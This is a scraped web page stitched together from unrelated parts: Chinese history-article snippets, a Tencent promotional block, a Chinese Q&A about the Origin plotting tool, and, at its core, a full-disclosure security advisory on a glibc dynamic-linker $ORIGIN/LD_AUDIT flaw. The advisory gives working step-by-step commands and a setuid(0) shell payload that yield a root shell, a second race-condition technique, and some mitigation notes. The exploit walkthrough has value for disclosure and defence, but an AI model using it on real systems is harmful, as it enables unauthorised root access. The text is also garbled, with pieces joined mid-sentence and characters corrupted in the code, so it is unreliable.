- Database Error
Discuz! Database Error
已经将此出错信息详细记录, 由此给您带来的访问不便我们深感歉意.为纪念毛泽东诞辰90周年,毛岸青前往毛主席纪念堂,向父亲敬献花并瞻仰遗容。
在2002年,朱镕基的眼睛已经很不好,医生要其做手术,但是朱镕基为了能够沿着1998年的洪水沿线走一遍而放弃了手术。“我不去看,我不放心,如果又是‘豆腐渣工程’怎么办?如果在我卸任前夕,来一次大洪水把大堤冲垮了,我怎么向老百姓交代?”
王明代表中共中央作了题为《学习毛泽东》的讲演, 王明说:“对于青干学生学习问题,我只贡献五个字:‘学习毛泽东!’青年干部学校既以毛泽东同志的光辉名字来命名,那就要名副其实,就要学习毛泽东同志的生平事业和理论。”
为纪念抗战胜利70周年,凤凰网历史频道走进台湾,采访10位统派青年。
叶群当时没有答复,过一会儿,叶群第二次给我打电话,说:“明天把这些乌龟送到钓鱼台,请江青同志吃。”乌龟是大补之品,叶群细致交代要怎么样怎么样……
来源:同舟共进
作者:于运深 舒云
但到了日,朝鲜战争爆发,形势发生了重大变化。我们只看到胡宗南在西南还有大军,于是二野分兵去了西南,三野又要守备大城市和扫清残敌,所以没有把二野三野集中起来解放台湾,而是
来源:人民网
作者:佚名
林彪说他每晚失眠,身体虚弱多病,怕风、怕光、怕声音。对于林彪讲的自己的身体情况,毛泽东是相信的。
来源:人民网
作者:马丽
慈禧一开始十分喜欢珍妃。甚至有一年夏天,慈禧太后要去颐和园避暑,临走时还特意带走了皇后与瑾嫔,任由光绪帝与珍嫔在紫禁城里过二人世界。
来源:人民网
作者:佚名
伪军郝鹏举第六集团军向共产党军队投降,伪军孙良诚第三集团军大部被共产党军队解除武装,加上伪满洲国军,实际数量不少于200万。所以,伪军总数应当是三到四百万人。
来源:红广角
作者:曹固强
1886年,盛宣怀刚刚接管轮船招商局时,户部在拒绝李鸿章提出的为轮船招商局的漕运加价的请求时,一针见血地指出,改革的好处,上不在国下不在商,而全在这些中饱私囊的官绅身上。
来源:人民网
作者:雪珥
假如崇祯没有裁撤驿卒,那么西北的农民叛乱就有时间有能力平定,而计划“安内之后攘外”也可以从容实施,至少,崇祯不会被李自成逼得上吊。如果我们反推一下,就不难看出其中的一条因果链:明朝
来源:人民网
作者:吴昊
在明代,正一品官员相当于现在的总理副总理一级,一个大国总理,年薪32万元不能算高。
来源:人民网
作者:洪振快
张居正说,定为“奸党”,也可以杀严世蕃,这当然不错。但你要定得了才行呀!显然,徐阶制造新的冤假错案,以“莫须有”的罪名除恶锄奸,实在是嘉靖逼出来的。
来源:人民网
作者:易中天
近600吨黄金几乎都落入日军手中。据估计,这些黄金的价值是当时日本全国财政收入的两倍。
来源:人民网
作者:刘作奎
不过,并没有虱子吞噬血肉时发出的细微响动。事实上,恰恰是这些肉眼几乎辨认不清的小昆虫,帮助俄罗斯人击碎了拿破仑的野心,进而改变了历史进程。
来源:人民网
作者:史春树
受骗上当并不能成为斯大林冤杀图哈切夫斯基的理由,斯大林除掉图哈切夫斯基,最重要的原因是:三十年代斯大林个人独裁接近登峰造极地步,尤其是在伏龙芝等军队将领去世之后,图哈切夫斯基这样的
来源:人民网
作者:上林
豪放大气,用湖南话来说是“霸蛮”。可以做一个具体的、量化的分析,毛泽东诗词里面大的字眼,名词要么是天,要么是海,要么是山,量词都是亿、千、万,尤其是“万”字,平均一首诗里不止一个“万”字。
来源:人民网
作者:蒲荔子 温友丽
“实际上,历史是唯一一门让学生学得越多就愚蠢的学科。”那些充斥于课本中的谎言与偏见,有人总结为虚构之说、片面之词和掩饰之计。而这些,大多来自于沿习已久的认知误区和基于某些冠冕堂皇理
来源:人民网
作者:佚名
他读《三国志》,认为蜀国之误始于此前诸葛亮《隆中对》里的战略构想。这个战略提出,将来得益州后派一上将守荆州,自己守汉中,大本营设在成都。本来就兵少势弱,又如此三分兵力,焉有不误的道
来源:人民网
作者:佚名
看起来令人信服的日军战史的水分也不小,刻意夸大战果,故意瞒报降低损失的情况并不罕见。
早期秦文化已凭借交错重叠的草原、中原文化素质以及绮丽多样的器物形态,为学界提供了丰富的材料。
这是一个拥有最新高科技军事技术的政权对一个技术落后的旧模式政权的胜利。
历史映像室
为繁荣中国近现代史学术研究,为优秀青年学者的学术专著出版提供资金及出版支持,为青年学者学术事业进步,提供助力。
在天山脚下,经过考古专家多日努力后,一个呈条状分布的石阵近日完整地露出地表。这一被称为“十三连墩”的文化符号遗址出现,把新疆游牧部族“尊七”的历史推到两千多年以前。
凤凰网历史官方微信
凤凰新媒体
||||||||||
||||||||||
||||||||||
||||| |||| |
凤凰新媒体 历史频道线上发布会给你一个线上平台,让媒体和潜在用户了解你的产品
线上发布会给你一个线上平台,让媒体和潜在用户了解你的产品
图文报道一篇发布在腾讯数码平台上的产品发布原创图文新闻
图文报道一篇发布在腾讯数码平台上的产品发布原创图文新闻
文章发布由你们亲自来讲述一个关于你们的故事,在腾讯数码发布
文章发布由你们亲自来讲述一个关于你们的故事,在腾讯数码发布
原创评测一篇由腾讯数码资深产品编辑执笔的客观产品评测(部分支持)
原创评测一篇由腾讯数码资深产品编辑执笔的客观产品评测(部分支持)
网友众测让潜在的用户直接接触你的产品,向更多人介绍产品
(部分支持)
网友众测让潜在的用户直接接触你的产品,向更多人介绍产品
(部分支持)
后续跟踪报道让产品的每一个小的升级改进都能被大众看见(部分支持)
后续跟踪报道让产品的每一个小的升级改进都能被大众看见(部分支持)
1发送邮件至,标题格式为“【寒武计划】XXXXX”。
2邮件正文请对产品进行简要描述,并写清产品特色。
3附件文档请包含产品描述、特色说明、预计销售渠道及售卖价格,产品图片及创业故事可选择性提供。
4联系人及详细联系方式。
腾讯数码寒武计划正式启动,我们只为在艰难的创业路上伴你前行,GNU C library dynamic linker - $ORIGIN expansion Vulnerability
from: /?l=full-disclosure&m=072&w=2
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
------------------------------------------------------------------------------
Gruezi, This is CVE-.
The dynamic linker (or dynamic loader) is responsible for the runtime linking of
dynamically linked programs. ld.so operates in two security modes, a permissive
mode that allows a high degree of control over the load operation, and a secure
mode (libc_enable_secure) intended to prevent users from interfering with the
loading of privileged executables.
$ORIGIN is an ELF substitution sequence representing the location of the
executable being loaded in the filesystem hierarchy. The intention is to allow
executables to specify a search path for libraries that is relative to their
location, to simplify packaging without spamming the standard search paths with
single-use libraries.
Note that despite the confusing naming convention, $ORIGIN is specified in a
DT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the
environment (developers would normally use the -rpath ld parameter, or
-Wl,-rpath,$ORIGIN via the compiler driver).
The ELF specification suggests that $ORIGIN be ignored for SUID and SGID
http://web.archive.org/web/25//developers/gabi//ch5.dynamic.html#substitution
&For security, the dynamic linker does not allow use of $ORIGIN substitution
sequences for set-user and set-group ID programs. For such sequences that
appear within strings specified by DT_RUNPATH dynamic array entries, the
specific search path containing the $ORIGIN sequence is ignored (though other
search paths in the same string are processed). $ORIGIN sequences within a
DT_NEEDED entry or path passed as a parameter to dlopen() are treated as
errors. The same restrictions may be applied to processes that have more than
minimal privileges on systems with installed extended security mechanisms.&
However, glibc ignores this recommendation. The attack the ELF designers were
likely concerned about is users creating hardlinks to suid executables in
directories they control and then executing them, thus controlling the
expansion of $ORIGIN.
It is tough to form a thorough complaint about this glibc behaviour however,
as any developer who believes they're smart enough to safely create suid
programs should be smart enough to understand the implications of $ORIGIN
and hard links on load behaviour. The glibc maintainers are some of the
smartest guys in free software, and well known for having a &no hand-holding&
stance on various issues, so I suspect they wanted a better argument than this
for modifying the behaviour (I pointed it out a few years ago, but there was
little interest).
However, I have now discovered a way to exploit this. The origin expansion
mechanism is recycled for use in LD_AUDIT support, although an attempt is made
to prevent it from working, it is insufficient.
LD_AUDIT is intended for use with the linker auditing api (see the rtld-audit
manual), and has the usual restrictions for setuid programs as LD_PRELOAD does.
However, $ORIGIN expansion is only prevented if it is not used in isolation.
The codepath that triggers this expansion is
_dl_init_paths() -& _dl_dst_substitute() -& _is_dst()
(in the code below DST is dynamic string token)
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l741
/* Expand DSTs.
size_t cnt = DL_DST_COUNT (llp, 1);
if (__builtin_expect (cnt == 0, 1))
llp_tmp = strdupa (llp);
/* Determine the length of the substituted string.
size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
/* Allocate the necessary memory.
llp_tmp = (char *) alloca (total + 1);
llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l245
if (__builtin_expect (*name == '$', 0))
const char *repl = NULL;
if ((len = is_dst (start, name, &ORIGIN&, is_path,
INTUSE(__libc_enable_secure))) != 0)
repl = l-&l_
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l171
if (__builtin_expect (secure, 0)
&& ((name[len] != '\0' && (!is_path || name[len] != ':'))
|| (name != start + 1 && (!is_path || name[-2] != ':'))))
As you can see, $ORIGIN is only expanded if it is alone and first in the path.
This makes little sense, and does not appear to be useful even if there were
no security impact. This was most likely the result of an attempt to re-use the
existing DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally
introducing this error.
Perhaps surprisingly, this error is exploitable.
--------------------
Affected Software
------------------------
At least the following versions have been tested
2.12.1, FC13
2.5, RHEL5 / CentOS5
Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.
--------------------
Consequences
-----------------------
It is possible to exploit this flaw to execute arbitrary code as root.
Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.
Exploitation would look like the following.
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3& /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -& /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -& /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat & payload.c
void __attribute__((constructor)) init()
setuid(0);
system(&/bin/bash&);
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT=&\$ORIGIN& exec /proc/self/fd/3
sh-4.1# whoami
sh-4.1# id
uid=0(root) gid=500(taviso)
-------------------
Mitigation
-----------------------
It is a good idea to prevent users from creating files on filesystems mounted
without nosuid. The following interesting solution for administrators who
cannot modify their partitioning scheme was suggested to me by Rob Holland
(@robholland):
You can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,
for example:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp
Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.
(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).
If someone wants to create an init script that would automate this at boot for
their distribution, I'm sure it would be appreciated by other administrators.
-------------------
-----------------------
Major distributions should be releasing updated glibc packages shortly.
-------------------
-----------------------
This bug was discovered by Tavis Ormandy.
-------------------
-----------------------
Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,
Asirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,
and all my other elite friends and colleagues.
Additional greetz to the openwall guys who saw this problem coming years ago.
They continue to avoid hundreds of security vulnerabilities each year thanks to
their insight into systems security.
-------------------
-----------------------
There are several known techniques to exploit dynamic loader bugs for suid
binaries, the fexecve() technique listed in the Consequences section above is a
modern technique, making use of relatively recent Linux kernel features (it was
first suggested to me by Adam Langley while discussing CVE-, but I
believe Gabriel Campana came up with the same solution independently).
The classic UNIX technique is a little less elegant, but has the advantage that
read access is not required for the target binary. It is rather common for
administrators to remove read access from suid binaries in order to make
attackers work a little harder, so I will document it here for reference.
The basic idea is to create a pipe(), fill it up with junk (pipes have 2^16
bytes capacity on Linux, see the section on &Pipe Capacity& in pipe(7) from the
Linux Programmers Manual), then dup2() it to stderr. Following the dup2(),
anything written to stderr will block, so you simply execve() and then make the
loader print some error message, allowing you to reliably win any race
condition.
LD_DEBUG has always been a a good candidate for getting error messages on
Linux. The behaviour of LD_DEBUG was modified a few years ago in response to
some minor complaints about information leaks, but it can still be used with a
slight modification (I first learned of this technique from a bugtraq posting
by Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).
The exploit flow for this alternative attack is a little more complicated, but
we can still use the shell to do it (this session is from an FC13 system,
output cleaned up for clarity).
# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.
$ (head -c 65534 /dev/ LD_DEBUG=nonsense LD_AUDIT=&\$ORIGIN& /tmp/exploit/target 2&&1) | (sleep 1h; cat) &
# Now ld.so is blocked on write() in the background trying to say &invalid
# debug option&, so we are free to manipulate the filesystem.
$ rm -rf /tmp/exploit/
# Put exploit payload in place.
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
# Clear the pipe by killing sleep, letting cat drain the contents. This will
# unblock the target, allowing it to continue.
$ pkill -n -t $(tty | sed 's#/dev/##') sleep
-bash: line 99: 26929 Terminated
# And now we can take control of a root shell :-)
sh-4.1# id
uid=0(root) gid=500(taviso)
Another technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then
while the loader is trying to map lots of memory, you have a good chance of
winning any race. I previously found an integer overflow in this feature and
suggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc
maintainers disagreed and just fixed the overflow.
/ml/libc-hacker/2007-07/msg00001.html
I believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the
next big loader bug is going to be, it's just not safe to let attackers have
that much control over the execution environment of privileged programs.
Finally, some notes on ELF security for newcomers. The following common
conditions are usually exploitable:
- An empty DT_RPATH, i.e. -Wl,-rpath,&&
This is a surprisingly common build error, due to variable expansion
failing during the build process.
- A relative, rather than absolute DT_RPATH.
For example, -Wl,-rpath,&lib/foo&.
I'll leave it as an exercise for the interested reader to explain why. Remember
to also follow DT_NEEDED dependencies, as dependencies can also declare rpaths
for their dependencies, and so on.
-------------------
References
-----------------------
- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.
- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.
- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.
- Linkers and Loaders, John R. Levine, ISBN 1-.
- Partitioning schemes and security, /taviso/blog/show.dml/654574
- CVE- description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html
You should subscribe to Linux Weekly News and help support their high standard
of security journalism.
http://lwn.net/
I have a twitter account where I occasionally comment on security topics.
Related Exploits
Matching CVEs (2):
Matching OSVDBs (1):
Matching setup file:origin 拟和 方程显示origin 在拟和后没有显示方程,怎么样能让他显示出来啊?我最进在学,还不懂,为什么别人的有一个方程的框框的,我没有呢?
韻酭儩酼00377
1.选择需要拟和的数据图2.菜单栏Analysis>Fit Polynomial3.在弹出的对话框中最后一行:Show Formula on Graph?后打勾即可
为您推荐:
其他类似问题
扫描下载二维码
